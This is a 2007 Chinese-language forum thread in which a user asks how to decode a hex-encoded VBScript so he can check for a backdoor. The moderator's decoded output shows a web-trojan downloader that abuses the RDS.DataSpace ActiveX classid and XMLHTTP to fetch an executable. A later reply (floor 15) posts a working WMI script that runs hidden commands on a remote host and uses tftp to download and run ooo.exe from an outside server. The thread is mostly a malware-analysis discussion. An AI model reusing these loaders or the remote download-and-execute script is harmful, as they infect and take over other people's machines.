|
kkapskok
初级用户
积分 29
发帖 10
注册 2007-6-4
状态 离线
|
『楼 主』:
请问这一段VBScript应该如何解密.. 郁闷啊``(lxmxn。。)
<script language="VBScript">
C="0d6f6e206572726f7220726573756d65206e6578740d6375726c3d22687474703A2F2F7777772E62616964752E636F6D2F62616964752E657865220d666e616d65313d2263696b652e657865220d666e616d65323d2263696b652e766273220d536574206466203d20646f63756d656e742e637265617465456c656d656e7428226f626a656374222"
C=C+"90d64662e7365744174747269627574652022636c6173736964222c2022636c7369643a42443936433535362d363541332d313144302d393833412d303043303446433239453336220d7374723d224d6963726f736f66742e584d4c48545450220d5365742078203d2064662e4372656174654f626a656374287374722c2222290d43313d2241646f220d43323d2264622e220d43333d22737472220d43343d"
这到底应该用什么工具来解密啊!! .. 查后门要紧啊!!!:(
[ Last edited by kkapskok on 2007-6-13 at 10:45 PM ]
|
|
 2007-6-13 02:44 |
|
|
baomaboy
银牌会员
积分 1513
发帖 554
注册 2005-12-30
状态 离线
|
|
|
2007-6-13 03:41 |
|
|
lxmxn
版主
积分 11386
发帖 4938
注册 2006-7-23
状态 离线
|
『第
3 楼』:
我得到的结果
| Quote: | on error resume next
curl="http://www.baidu.com/baidu.exe"
fname1="cike.exe"
fname2="cike.vbs"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
C1="Ado"
C2="db."
C3="str"
C4= |
|
[ Last edited by lxmxn on 2007-6-13 at 04:25 PM ]
|
|
|
2007-6-13 14:54 |
|
|
dikex
高级用户
潜水修练批处理
积分 788
发帖 366
注册 2006-12-31
状态 离线
|
『第
4 楼』:
网马常用的转换为16进制ASCII码;
不过如果加了偏移等,楼主只是发这些数据是不能解开的
|
正在潜水修练的批处理小白 |
|
|
2007-6-13 18:59 |
|
|
kkapskok
初级用户
积分 29
发帖 10
注册 2007-6-4
状态 离线
|
『第
5 楼』:
厉害的版主 能解开啊。。。 能请问下用什么方法解密的吗`` 我急需去找看看有没有后门。。。。
|
|
|
2007-6-13 22:31 |
|
|
meayjun
初级用户
积分 24
发帖 8
注册 2007-6-13
状态 离线
|
|
|
2007-6-13 22:33 |
|
|
kkapskok
初级用户
积分 29
发帖 10
注册 2007-6-4
状态 离线
|
『第
7 楼』:
我厉害什么哦。。。。 是板主厉害啊,,, 能请教下 是怎么解密的吗。。 急需去看看有没有后门。。急死。。
|
|
|
2007-6-13 22:34 |
|
|
kkapskok
初级用户
积分 29
发帖 10
注册 2007-6-4
状态 离线
|
『第
8 楼』:
请版主快快进来一下 能请教下 是怎么解密的吗。。。 太急了。。
|
|
|
2007-6-13 22:45 |
|
|
lxmxn
版主
积分 11386
发帖 4938
注册 2006-7-23
状态 离线
|
|
|
2007-6-14 00:05 |
|
|
lxmxn
版主
积分 11386
发帖 4938
注册 2006-7-23
状态 离线
|
『第
10 楼』:
%file% 是指的只含有16进制数码的文本。
|
|
|
2007-6-14 00:06 |
|
|
kkapskok
初级用户
积分 29
发帖 10
注册 2007-6-4
状态 离线
|
『第
11 楼』:
谢谢!! 十分感谢版主! 谢谢分享!!
|
|
|
2007-6-15 01:02 |
|
|
lililulula
中级用户
积分 302
发帖 138
注册 2007-3-29
状态 离线
|
|
|
2007-6-15 10:45 |
|
|
lxmxn
版主
积分 11386
发帖 4938
注册 2006-7-23
状态 离线
|
『第
13 楼』:
| Quote: | Originally posted by lililulula at 2007-6-15 10:45:
好久不来 斑竹功力大增~~~ |
|
兄过奖了,我只会弄简单的,难的就不会了。o_O
|
|
|
2007-6-15 11:07 |
|
|
hazjs
初级用户
积分 60
发帖 25
注册 2007-6-24
状态 离线
|
『第
14 楼』:
求各位老大帮我也解密下,先谢谢你们了
谢谢老大帮我解密了
[ Last edited by hazjs on 2007-6-25 at 07:18 AM ]
|
|
|
2007-6-24 08:56 |
|
|
slore
铂金会员
积分 5212
发帖 2478
注册 2007-2-8
状态 离线
|
 『第
15 楼』:
Const HIDDEN_WINDOW = 12
strComputer = wscript.arguments(0)
strUserName = wscript.arguments(1)
strPassWord = wscript.arguments(2)
Set objSWbemLocator = CreateObject("wbemscripting.swbemlocator")
Set objSWbemServices = objSWbemLocator.ConnectServer(strComputer,"root\cimv2",strUserName,strPassWord)
Set objStartup = objSWbemServices.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objSWbemObject = objSWbemServices.Get("Win32_Process")
bat = objSWbemObject.Create("cmd.exe /c echo tftp -i 676757.vicp.net get ooo.exe>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c echo ping -n 20 127.1>>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c echo ooo.exe>>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c ftp.bat", Null, objConfig, intProcessID)
|
|
|
2007-6-24 10:11 |
|
